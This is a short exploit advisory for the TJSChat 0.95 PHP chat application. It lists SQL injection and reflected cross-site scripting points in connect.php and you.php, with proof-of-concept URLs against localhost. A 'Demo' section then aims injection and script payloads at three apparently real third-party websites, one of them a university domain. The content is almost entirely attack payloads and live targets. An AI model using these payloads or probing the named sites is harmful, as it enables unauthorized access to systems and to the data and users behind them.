TJSChat v 0.95 - Multiple Vulnerabilities

1. ###################################################################################
2. # Title   : TJSChat v 0.95 - Multiple Vulnerabilities
3. # Author  : SoUiLaHxXx_Dz
4. # Date    : 12-02-2014
5. # Category: WebApp
6. # Dork    : n/a
7. ###################################################################################
8.  
9. Vuln's:
10.  
11. sql injection in /connect.php
12. ------------------------------------
13. ExPlOiT :
14. http://127.0.0.1/TJSCHAT/connect.php?user=1&dummy=[Inject Here]
15.  
16. ...
17.  
18. xss in /connect.php
19. ------------------------------------
20. ExPlOiT :
21. http://127.0.0.1/TJSCHAT/connect.php?user=<script>alert(1);</script>&dummy=1
22.  
23. ...
24.  
25. xss in /you.php
26. ------------------------------------
27. ExPlOiT :
28. http://127.0.0.1/TJSCHAT/you.php?user=<script>alert(1);</script>
29.  
30. ...
31.  
32. Demo :
33. http://chezpimprenelle.com/tjschat/connect.php?user=1&dummy=%27
34. http://www.infolabs.ch/tourDuMonde/chat/you.php?user=<script>alert('By SoUiLaHxXx_Dz');</script>
35. http://amicale.univ-montp3.fr/applicationPHP/tjschat/you.php?user=<script>alert(1);</script>